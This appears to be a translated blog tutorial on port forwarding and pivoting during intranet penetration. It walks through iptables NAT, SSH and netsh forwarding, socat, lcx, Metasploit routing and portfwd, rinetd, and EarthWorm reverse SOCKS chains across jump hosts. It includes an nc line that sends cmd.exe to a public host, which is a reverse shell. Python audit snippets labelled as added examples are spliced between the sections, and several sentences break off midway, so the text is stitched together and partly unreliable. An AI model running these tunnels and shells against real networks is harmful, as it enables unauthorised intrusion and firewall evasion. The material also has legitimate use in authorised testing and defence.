Port forwarding in Intranet penetration

It should be understood that, in the whole process of a penetration test, obtaining a webshell through a web application or an open port is only one part of the craft. Penetrating the network of a real, complex enterprise environment is deep water: it involves a whole series of problems such as network transmission, port forwarding, domain penetration and privilege escalation. This article therefore records some notes from my study of Intranet penetration. In the process I drew on the valuable experience of many predecessors; I have collected those links and put them in the references section.

2. Forwarding, mapping, proxy

These concepts are quite hard to tell apart, especially when they are mixed together with the Intranet penetration that builds on them. At a macro level they are not very different, but their nature differs considerably. Here is my personal understanding of these concepts:

Forwarding: forwarding is a means of penetration. It is the act of forwarding a network port from one network node to another, so that an extranet user reaches a port at an Intranet IP address through a NAT router. It is sometimes called a tunnel.

Mapping: mapping is also a means of penetration. Port mapping maps a port of the IP address of an extranet host to a machine on the Intranet, which provides the corresponding service. In fact, a lot of the time forwarding and mapping

Proxy: a proxy is a result, built on top of port forwarding and mapping. Proxies are often used for Web services connected to the Internet to get around IP blocking and conceal identity. The underlying principle is dynamic port forwarding: a tunnel is established between the host and the proxy, and the proxy dynamically obtains the address and port of the connection from each request the host initiates.

Intranet penetration: Intranet penetration is the purpose. The means used include port forwarding and mapping, or the direct use of a proxy. Most of the time, when we talk about an Intranet penetration scenario, we mean that the attack machine and the target machine are on different Intranets, so techniques such as a reverse shell cannot be used directly because the IP addresses cannot reach each other. This is when you need some common Intranet penetration tools, which themselves use port forwarding, mapping or similar methods to get through.

3. Built-in forwarding tools of the system

iptables NAT

In Linux, the kernel parameter /proc/sys/net/ipv4/ip_forward is set to 0 by default for security reasons, so NAT forwarding is disabled. You can change this parameter in the following two ways:

Temporary solution

```sh
echo 1 > /proc/sys/net/ipv4/ip_forward
```

Long-term solution

Edit /etc/sysctl.conf with vi:

```sh
# Find the following value and change 0 to 1
net.ipv4.ip_forward = 1
```

Run sysctl -p for the change to take effect immediately.

Here is an example of forwarding:

```sh
# 192.168.2.2 is the Intranet IP address; 1.1.1.1 is the address exposed by this host
iptables -t nat -A PREROUTING -p tcp -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:8080
iptables -t nat -A POSTROUTING -p tcp -s 192.168.2.2 --sport 8080 -j SNAT --to-source 1.1.1.1
service iptables save
```

This maps access to 1.1.1.1:80 to 192.168.2.2:8080. Notice here
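As an added defender-side example (not part of the original article), the following Python audits the two artefacts this section touches, the ip_forward switch and the NAT table, by parsing a constructed `iptables-save -t nat` output for the rules just shown; the sample text and function names are my own.

```python
import shlex

# Constructed sample: what `iptables-save -t nat` prints once the two rules above
# are loaded (iptables-save renders the -d/-s hosts with a /32 mask).
SAMPLE_NAT_TABLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -d 1.1.1.1/32 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.2.2:8080
-A POSTROUTING -s 192.168.2.2/32 -p tcp -m tcp --sport 8080 -j SNAT --to-source 1.1.1.1
COMMIT
"""
NAT_TARGETS = ("DNAT", "SNAT", "MASQUERADE", "REDIRECT")

def parse_nat_rules(iptables_save_text):
    """Return one dict per -A rule whose target rewrites addresses (DNAT/SNAT/...)."""
    rules = []
    for line in iptables_save_text.splitlines():
        if not line.startswith("-A "):
            continue
        tokens, opts, i = shlex.split(line), {}, 0
        while i < len(tokens):  # options are "-flag value" pairs or bare flags
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                opts[tokens[i]] = tokens[i + 1]
                i += 2
            else:
                opts[tokens[i]] = True
                i += 1
        if opts.get("-j") in NAT_TARGETS:
            rules.append({
                "chain": opts["-A"], "target": opts["-j"], "proto": opts.get("-p", "all"),
                "match": opts.get("-d") or opts.get("-s") or "any",
                "port": opts.get("--dport") or opts.get("--sport") or "any",
                "to": opts.get("--to-destination") or opts.get("--to-source") or "-",
            })
    return rules

def ip_forward_enabled(proc_value):
    """True when /proc/sys/net/ipv4/ip_forward reads 1, i.e. the kernel routes packets."""
    return proc_value.strip() == "1"

def describe_forwarding(proc_value, iptables_save_text):
    """One finding line per fact a host audit should report."""
    findings = []
    if ip_forward_enabled(proc_value):
        findings.append("ip_forward=1: kernel forwards packets between interfaces")
    for r in parse_nat_rules(iptables_save_text):
        findings.append(f"{r['chain']} {r['target']} {r['proto']} {r['match']}:{r['port']} -> {r['to']}")
    return findings
```

On a live host, feed it the contents of /proc/sys/net/ipv4/ip_forward and the output of `iptables-save -t nat`; a non-empty result on a machine that is not meant to route is worth a ticket.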

nc

```sh
nc -t -e cmd.exe <public network host IP address> 4444
```

SSH

```sh
# Local port forwarding
ssh -CfNg -L port1:127.0.0.1:port2 user@host
# Parameters: -L <local NIC address>:<local port>:<destination IP address>:<destination port>

# Remote port forwarding
ssh -CfNg -R port2:127.0.0.1:port1 user@host
# Parameters: -R <remote NIC address>:<remote port>:<destination IP address>:<destination port>

# Dynamic port forwarding
ssh -D localhost:2000 user@host
# Parameter: -D <local NIC address>:<local port>
```
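The three modes above (-L, -R, -D) only work when the remote sshd permits them, so as an added example (my own, not from the article) here is a Python check of the sshd_config directives that govern them; the sample configuration is constructed and the defaults are those documented in sshd_config(5).

```python
# Directive -> (sshd default, hardened value). AllowTcpForwarding governs -L, -R
# and -D; GatewayPorts decides whether -R listeners bind beyond loopback; PermitTunnel
# is the tun(4) VPN mode; AllowStreamLocalForwarding is the Unix-socket equivalent.
FORWARDING_DIRECTIVES = {
    "AllowTcpForwarding": ("yes", "no"),
    "GatewayPorts": ("no", "no"),
    "PermitTunnel": ("no", "no"),
    "AllowStreamLocalForwarding": ("yes", "no"),
}
_BY_LOWER = {name.lower(): name for name in FORWARDING_DIRECTIVES}

# Constructed sshd_config excerpt: forwarding left on and GatewayPorts opened,
# which lets a -R listener face the network instead of loopback only.
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding yes
GatewayPorts yes
Match User backup
    AllowTcpForwarding no
"""

def effective_forwarding_settings(config_text):
    """Global value of each directive: unset ones take the sshd default, and as in
    sshd the first occurrence wins. Parsing stops at the first Match block, whose
    settings apply only to the matched users and never widen the global policy."""
    settings = {name: default for name, (default, _) in FORWARDING_DIRECTIVES.items()}
    seen = set()
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        name = _BY_LOWER.get(key)
        if name and name not in seen and len(parts) == 2:
            settings[name] = parts[1].strip().lower()
            seen.add(name)
    return settings

def weak_forwarding_settings(config_text):
    """Directives whose effective value differs from the hardened value."""
    current = effective_forwarding_settings(config_text)
    return {n: v for n, v in current.items() if v != FORWARDING_DIRECTIVES[n][1]}

def hardened_directives():
    """The explicit lines to put in sshd_config on a host that must not relay traffic."""
    return [f"{name} {hard}" for name, (_, hard) in FORWARDING_DIRECTIVES.items()]
```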

netsh

Netsh is a command-line tool for network management on Windows. It is an interactive shell built around the concept of contexts: you enter the relevant context interactively and set the parameters there. Port forwarding can also be configured non-interactively, as follows.

```sh
netsh interface ipv6 install
# forward
netsh interface portproxy add v4tov4 listenaddress=10.10.18.1 listenport=4455 connectaddress={target IP} connectport={target port}
# delete
netsh interface portproxy delete v4tov4 listenaddress={B's IP} listenport={B's port}
```

4. Non-built-in port forwarding tools

socat

The port forwarding function of socat is useful for capturing packets locally when constructing an SSRF payload, because socat records the traffic it forwards. Socat is used as the intermediary to capture the payload packet we constructed, after which further operations, such as constructing a gopher payload, can be carried out.

```sh
# Installation
yum install -y socat
apt install -y socat

# TCP
nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000 &
# TCP4-LISTEN:10000      listen on IPv4 TCP port 10000
# fork TCP4:1.1.1.1:10000  forward packets to port 10000 of 1.1.1.1; change the IP address and port as required
# nohup                  run in the background; the command can also be written to /etc/rc.local

# UDP
nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000 &
```

lcx.exe

```sh
lcx -<listen|tran|slave> <option> [-log logfile]

-listen <listen port> <forwarding port>
-tran   <listen port> <target address> <target port>
-slave  <target host> <target port> <local host> <local port>

# Run the following command on the Intranet host:
lcx.exe -slave <public IP address> <port> <internal IP address> <port>
# Example:
lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389

# Run the following command on the public network host:
# listen on port 51 and forward it to port 3389 on the public network host
lcx.exe -listen 51 3389
```

Metasploit socks4a

A combination of three things is used in the actual penetration process: a routing table + socks4a + proxychains. In this way the penetration tools on the attack machine can use the Meterpreter session as a springboard into the Intranet. Here is the flow.

```sh
# 1. Add a route through the reverse shell session, for example:
run autoroute -s 192.168.122.0/24
# 2. Use the socks4a module and set the port
use auxiliary/server/socks4a
# 3. Configure proxychains
```

Meterpreter portfwd

The port forwarding command is built into the MSF penetration framework and can be used directly once a shell has been obtained. The relevant parameters are explained below.

```
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.

# Example:
portfwd add -L 127.0.0.1 -l 1212 -r 10.10.12.1 -p 3389
```

Rinetd

CentOS does not carry rinetd in its default software sources, so you need to import one manually.

```sh
# centos 32
$ vim /etc/yum.repos.d/nux-misc.repo
[nux-misc]
name=Nux Misc
baseurl=http://li.nux.ro/download/nux/misc/el6/i386/
enabled=0
gpgcheck=1
gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro

# centos 64
$ vim /etc/yum.repos.d/nux-misc.repo
[nux-misc]
name=Nux Misc
baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/
enabled=0
gpgcheck=1
gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro

$ yum --enablerepo=nux-misc install rinetd

# ubuntu
$ apt-get install rinetd

# Configuration parameter format
[bindaddress] [bindport] [connectaddress] [connectport]
# bound address, bound port, connected address, connected port
[source address] [source port] [destination address] [destination port]

# Example
$ vim /etc/rinetd.conf
0.0.0.0 8080 172.19.94.3 8080
0.0.0.0 2222 192.168.0.103 3389
1.2.3.4 80 192.168.0.10 80
allow *.*.*.*
logfile /var/log/rinetd.log

# Explanation
# 0.0.0.0 means the host binds all available addresses
# line 1: forward all requests to port 8080 on the host to port 8080 on 172.19.94.3
# line 2: forward all requests sent to port 2222 to port 3389 at 192.168.0.103
# line 3: forward all requests sent to port 80 at 1.2.3.4 to port 80 at 192.168.0.10
# allow    specifies the IP addresses that are allowed to connect
# logfile  sets the location of the log file

# Run
# script start
$ /etc/init.d/rinetd start
# binary start
$ /usr/sbin/rinetd -c /etc/rinetd.conf
# stop
$ /etc/init.d/rinetd stop
```
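As an added example that is not part of the original article, this Python parser reads the rinetd.conf format described above (forwarding lines, allow/deny patterns, logfile), models rinetd's allow/deny semantics in simplified form, and flags rules that expose a private host on every interface; the sample configuration is constructed from the article's example with one extra deny line.

```python
import ipaddress
import re

# Constructed sample built from the article's example, plus a deny line that
# applies only to the 2222 -> 3389 rule because it follows that rule.
SAMPLE_RINETD_CONF = """\
allow *.*.*.*
logfile /var/log/rinetd.log
0.0.0.0 8080 172.19.94.3 8080
0.0.0.0 2222 192.168.0.103 3389
deny 10.0.*.*
1.2.3.4 80 192.168.0.10 80
"""

def _pattern(pattern):
    """rinetd address patterns: '*' matches any run of characters, '?' one character."""
    return re.compile("^" + re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".") + "$")

def parse_rinetd_conf(text):
    """Return (forwards, global_acl, logfile); each forward carries its own acl list."""
    forwards, global_acl, logfile = [], [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] in ("allow", "deny") and len(parts) == 2:
            # before any forwarding rule: global; afterwards: attached to the last rule
            (forwards[-1]["acl"] if forwards else global_acl).append((parts[0], parts[1]))
        elif parts[0] == "logfile" and len(parts) == 2:
            logfile = parts[1]
        elif len(parts) == 4:
            forwards.append({"bind": parts[0], "bind_port": int(parts[1]),
                             "to": parts[2], "to_port": int(parts[3]), "acl": []})
    return forwards, global_acl, logfile

def client_allowed(client_ip, acl_lists):
    """A deny match rejects; otherwise, if any allow pattern exists, one must match."""
    allows = [p for acl in acl_lists for kind, p in acl if kind == "allow"]
    denies = [p for acl in acl_lists for kind, p in acl if kind == "deny"]
    if any(_pattern(p).match(client_ip) for p in denies):
        return False
    return not allows or any(_pattern(p).match(client_ip) for p in allows)

def exposed_private_forwards(forwards):
    """Rules that listen on every interface and relay into a private (RFC 1918) host."""
    return [f for f in forwards
            if f["bind"] == "0.0.0.0" and ipaddress.ip_address(f["to"]).is_private]
```

Pass the global list together with a rule's own list to client_allowed to evaluate that rule the way rinetd does; exposed_private_forwards assumes IP literals in the connect column.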

Tunna and reGeorg

Both of these tools are fairly simple to use, so without further ado: once you have a webshell, you can do port forwarding over HTTP with them. Here are the two project addresses; reGeorg is recommended, as Tunna is unstable. Tunna tool address

Localtunnel and ngrok

Both tools can map ports on the Intranet to the public network, so that accessing the public address is equivalent to accessing the port on the Intranet. With either tool you can run your own server or use the server the project provides for Intranet penetration. Such tools are not often used in actual penetration. A more direct scenario is when the attack machine is on an internal network and needs to be reachable by the target machine for call-back operations. After all, they only provide single-level forwarding, and the operation is troublesome. Here are the project addresses:

Github.com/localtunnel…

ngrok.com/

EW

The tool's address is rootkiter.com/EarthWorm/

This is a domestic tunnelling tool; thanks to its convenient multi-level forwarding, reverse proxy support and other characteristics, it has made a name for itself in the field of Intranet penetration. It is important to note that this tool is really powerful

The tool has six command formats (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen and lcx_tran). The official examples are explained as follows:

Forward proxy

```sh
$ ./ew -s ssocksd -l 1080
```

This enables port 1080 of the machine as a forward proxy; proxied port forwarding is then done by connecting to port 1080 of this machine. The general scenario is: Kali connects through proxychains to the public IP address on which the forward proxy was enabled.

Reverse proxy

```sh
# On public IP host A, whose IP address is assumed to be 1.1.1.1
$ ./ew -s rcsocks -l 1080 -e 8888
# On target host B
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
```

A reverse proxy differs from a forward proxy in that the target initiates the connection to us. Once the connection is established, the proxy flow looks like Me <--> A <--> B. That is, as long as I connect to port 1080 of A, I get a reverse proxy tunnel and can establish a connection to B. This scenario can be used to get past firewalls with strict inbound policies but loose outbound policies.

Multi-level forwarding

In the previous two scenarios we saw the use of rcsocks, ssocksd and rssocks. We will see the other three commands in action in multi-level forwarding. They act as middleware, responsible for diverting and linking the tunnel.

```sh
# Command examples:
# lcx_listen forwards a local port
$ ./ew -s lcx_listen -l 1080 -e 8888
# lcx_tran forwards a local port to the destination IP address
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
# lcx_slave acts as the slave end, connecting the two sides
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
```

Let’s take a look at an example of an actual three-level infiltration cascade:

```sh
# On our own VPS
$ ./ew -s rcsocks -l 1080 -e 8888

# On jumper A
$ ./ew -s lcx_slave -d ip_A -e 8888 -f ip_B -g 9999

# On jumper B
$ ./ew -s lcx_listen -l 9999 -e 7777

# On jumper C
$ ./ew -s rssocks -d ip_B -e 7777
```

SOCKS V5 -> 1080 -> 8888 -> 9999 -> 7777 -> RSSOCKS.

First, this is an example of a reverse proxy. The destination of the reverse proxy is port 7777 of C. Once the tunnel is established, we only need to connect to port 1080 of the VPS and it automatically forwards us to 7777. Now the intermediate steps: the first command makes the VPS receive the reverse proxy on 8888 and wait for our connection on 1080. The second command directs port 8888 of jumper A to port 9999. The third directs port 9999 of jumper B to 7777. Finally, the fourth command starts the reverse proxy on jumper C, which connects to port 7777 of jumper B.

FRP

FRP also provides complete Intranet penetration capabilities, similar to those of ngrok, but FRP's configuration is more flexible. Recommended ranking: FRP > Localtunnel > ngrok

5. Tunnels through the firewall

The port forwarding described above uses the HTTP protocol, the TCP protocol and SOCKS proxies. However, the traffic forwarded by these protocols is conspicuous and easily filtered by strict firewall rules, so that the shell cannot get out of the Intranet. In that case we need a strong tunnel that goes through the firewall. Below are some UDP/DNS tunnels and ICMP tunnels the author found on the Internet; it can be said that these two kinds of tunnel are very ingenious, and the author was amazed on reading about them. For now I will only put the relevant tool links and reading material here; I cannot write more at the moment, to avoid making this too long (or out of laziness), and will fill in the blanks next time.

[Resources & Tools Sharing]